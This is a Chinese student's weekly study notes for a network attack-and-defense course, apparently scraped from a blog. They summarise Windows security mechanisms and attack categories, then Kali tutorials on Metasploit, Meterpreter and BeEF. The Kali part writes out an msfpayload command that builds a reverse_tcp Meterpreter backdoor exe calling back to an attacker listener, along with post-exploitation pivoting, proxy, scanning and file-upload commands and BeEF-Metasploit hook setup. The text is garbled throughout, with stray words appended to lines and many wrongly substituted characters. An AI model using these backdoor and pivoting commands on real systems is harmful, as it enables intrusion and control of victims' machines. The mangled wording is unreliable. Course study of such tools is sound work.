2017-2018-2 20179204《網絡攻防實踐》第七週學習總結

第1節 教材學習內容總結

本週學習了教材第七章的內容。javascript

###1.1 Windows操做系統的基本結構 html

  • Windows操做系統內核的基本模塊包括以下:java

    Windows執行體
    	Windows內核體
    	設備驅動程序
    	硬件抽象層
    	Windows窗口與圖形界面接口內核實現代碼
  • Windows操做系統在用戶態的代碼模塊則包括以下:sql

    系統支持進程
    	環境子系統服務進程
    	服務進程
    	用戶應用軟件
    	核心子系統DLL
  • Windows操做系統內核中實現了以下的核心機制:shell

    Windows進程和線程管理機制
    	Windows內存管理機制
    	Windows文件管理機制(NTFS)
    	Windows註冊表管理機制
    	Windows的網絡機制

###1.2 Windows操做系統的基本結構數據庫

  • Windows安全體系結構

Windows操做系統基於引用監控器模型來實現基本的對象安全模型。windows

Windows身份認證機制
  	Windows受權與訪問控制機制
  	Windows安全審計機制
  • Windows的其餘安全機制

除了身份認證、受權與訪問控制及安全審計這三個基本安全功能特性以外,windows操做系統中還實現了大量其餘安全機制。api

引入windows安全中心,集成了對於保護windows系統安全穩定運行最爲關鍵的三項安全措施——防火牆、補丁自動更新以及病毒防禦瀏覽器

除安全中心外,windows安全特性還包括ipsec加密與驗證機制、efs加密文件系統、windows文件保護機制、捆綁的ie瀏覽器所提供的隱私保護與瀏覽安全保護機制等。安全

###1.3 Windows遠程攻擊技術

遠程口令猜想與破解攻擊
  	攻擊Windows網絡服務
  	攻擊Windows客戶端及用戶
  • Windows系統的安全漏洞生命週期

    Windows安全漏洞發現、利用與修補過程
    	安全漏洞公開披露信息庫:幾個知名的通用漏洞信息庫:CVE、NVD、SecurityFocus、OSVDB等。
    	針對特定目標的滲透測試攻擊過程:①漏洞掃描測試②查找針對發現漏洞的滲透代碼③實施滲透測試
    	使用Metasploit軟件實施滲透測試

Metasploit是徹底開源的滲透測試軟件。採用開發框架和模塊組件的可擴展模型,以Ruby語言編寫的Metasploit Framework(MSF)庫做爲整個軟件的基礎核心,爲滲透測試組件的開發與測試提供平臺;模塊組件是真正實施滲透攻擊的代碼。

Metasploit提供了CLI、Console、Web和GUI四種不一樣的用戶交互接口,其中Console終端是比較經常使用的方式。

具體操做見p247。

  • Windows遠程口令猜想與破解攻擊

    遠程口令字猜想
    	遠程口令字交換通訊竊聽與破解
    	遠程口令猜想與破解防範措施
  • Windows網絡服務遠程滲透攻擊

Windows操做系統默認開放135(TCP),137(UDP),139(TCP)與445(TCP)端口,對應的網絡服務爲MSRPC與過程調用服務,NetBIOS網絡基本輸入輸出系統服務和SMB文件與打印機共享服務。

針對NetBIOS網絡服務的著名漏洞及攻擊
  針對SMB網絡服務的著名漏洞及攻擊
  針對MSRPC網絡服務的著名漏洞及攻擊
  針對Windows系統上微軟網絡服務的遠程滲透攻擊
  針對Windows系統上第三方網絡服務的遠程滲透攻擊
  網絡服務遠程滲透攻擊防範措施

###1.4 Windows本地安全攻防技術

  • windows本地特權提高

受限用戶權限嘗試得到特權帳戶的攻擊技術也被稱爲特權提高,業內簡稱爲「提權」。Windows系統上進行特權提高的攻擊途徑主要是經過DLL注入和破解本地程序安全漏洞。

  • windows敏感信息竊取

    Windows系統口令字密文提取技術 
    	Windows系統口令字破解技術
    	用戶敏感數據竊取
    	本地敏感信息竊取
  • windows消蹤滅跡

    關閉審計功能
    	清理事件日誌
    	針對消蹤滅跡的防範措施
  • windows遠程控制與後門程序

    命令行遠程控制工具
    	圖形化遠程控制工具
    	針對後門程序的防範措施

第2節 課堂測試——windows攻擊

使用Metaspoit攻擊MS08-067,提交正確獲得遠程shell過程的截圖。

第3節 kali視頻(26-30)學習

###26.KaliSecurity 漏洞利用之檢索與利用

  • searchsploit能夠藉助關鍵詞搜索漏洞信息以及漏洞對應的exp。 searchsploit wordpress列出了漏洞和文件地址。 查看列出的文件,例:
  • ikat自動化開啓不一樣的exp,等待目標訪問中招。
  • termineter旨在評估智能電錶的安全性。

###27.KaliSecurity 漏洞利用之Metasploit基礎 Metasploit在滲透測試中常常被用到。這套軟件包括了不少工具,這些工具組成了一個完整的攻擊框架。

  • 啓動服務

在Kali中使用Metasploit,須要先開啓PostgreSQL數據庫服務和metasploit服務,而後就能夠利用msf數據庫查詢exploit和記錄。

  • 路徑介紹

Kali中msf的路徑爲/usr/share/metasploit-framework。

Auxiliary:輔助模塊

encoders:供msfencode編碼工具使用,具體可使用 msfencode –l但顯示命令不存在。

exploits:攻擊模塊 每一個介紹msf的文章都會提到那個ms08_067_netapi,它就在這個目錄下。

payloads:其中列出的是攻擊載荷,也就是攻擊成功後執行的代碼。好比咱們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。

post:後滲透階段塊,在得到meterpreter的shell以後可使用攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。

  • 基本命令

msfpayload:用來生成payload或者shellcode。 搜索時能夠用msfpayload -l |gre[ "windows"這樣的命令查詢。-o選項能夠列出payload所需的參數。

msfencode:msf中的編碼器,早期用來繞過AV(殺毒軟件),現經常使用msfpayload與它編碼避免exploit的壞字符串。

msfconsole:開啓metasploit的console。 輸入msfconsole,打開msf。

  • 測試示例:發現漏洞,搜索exploit nmap -sV 172.30.2.73 能夠看到21端口開放的是ftp服務,用的版本是ftpd 5.0。

此版本是否存在漏洞,在msf裏搜索一下,發現有匹配項。

###28.KaliSecurity 漏洞利用之Meterpreter介紹

  • 生成Meterpreter後門

打開MSF,開啓監聽(選擇exploit/multi/handler)。 命令msfpayload windows/meterpreter/reverse_tcp LHOST=172.30.2.73 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe 在指定目錄,生成exe後門。 更新的kali,如今已經沒有msfpayload的命令了,換成msfvenom了。裏面集成了msfpayload和msfencode,而後將door植到對方主機 ###29.KaliSecurity 漏洞利用之Metasploit後滲透測試 在跳板獲取必定權限後,須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,藉助msf已經獲得的Meterpreter後門,可使後續的操做更容易。

  • 查看當前網卡、網段信息(使用ifconfig)。可查看到三個網卡,一個是本地網卡,另外一個是咱們能訪問的網卡,還有一個網卡具備內網IP(訪問不到,能夠ping如下試試)。
  • 添加路由表run autoroute -s 10.0.0.1。可使用msf中的模塊跨網段攻擊或掃描。可經過腳本autoroute快速添加。
  • 開socket代理,經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,sqlmap,nmap使用。經過代理便可訪問內網計算機。
  • 經過background和session -i能夠自由切換進入session。
  • 輸入run能夠看到在meterpreter上能夠作的不少命令。
  • 經過run post/能夠看到後滲透測試模塊。
  • 獲取內網信息run arp_scanner -r 10.0.0.1/24
  • 也能夠上傳文件,作端口轉發後進行後續測試,例如upload lcx.exe c:\傳送文件到c盤根目錄。

###30.KaliSecurity 漏洞利用之BeEF

  • 在命令行下啓動BeeF,beef-xss

  • 假設被測試主機因爲XSS漏洞請求到http://127.0.0.1:3000/demos/basic.html,此時頁面左側就會多出一項在線主機:

  • hook持續的時間爲關閉測試頁面爲止,在此期間,至關於被控制了,能夠發送攻擊命令,在commands模塊,咱們能夠完成不少任務: 其中四種顏色分別表示:

    該攻擊模塊可用,且隱蔽性強
    	該攻擊模塊可用,但隱蔽性差
    	該用戶模塊是否可用還有待驗證
    	該攻擊模塊不可用
  • 選取misc下的raw javascript模塊做爲測試用例,右端表格有該模塊的詳細說明,以及一些可選的參數等。輸入javascript code,點擊excute進行攻擊。在此,輸入的是hello world,返回成功!

  • Proxy功能(代理功能)

選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。

  • BeeF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置。

首先打開beef xss目錄:

cd /usr/share/beef-xss/
  ls
  nano config.yaml  /*編輯一下,能夠看到有不少配置信息,包括用戶名、密碼均可以在這設置,在此將Metasploit的false修改成true */
  clear

保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑:

cd extensions/metasploit/
  ls
  nano config.yaml

/* 將host和callback_host行的IP修改成本機IP,並修改custom路徑爲/usr/share/metasploit-framework/ */ 配置好後打開msfconsole,運行命令:

load msgrpc ServerHost=192.168.199.198 Pass=abc123

執行./beef -x,從新加載Metasploit的exploit模塊。加載以後,重啓下服務service beef-xss restart 此時再訪問如下以前的頁面,發現沒法鏈接,稍等片刻,使用默認用戶密碼登陸進去。發現Metasploit下多了許多模塊:

相關文章
相關標籤/搜索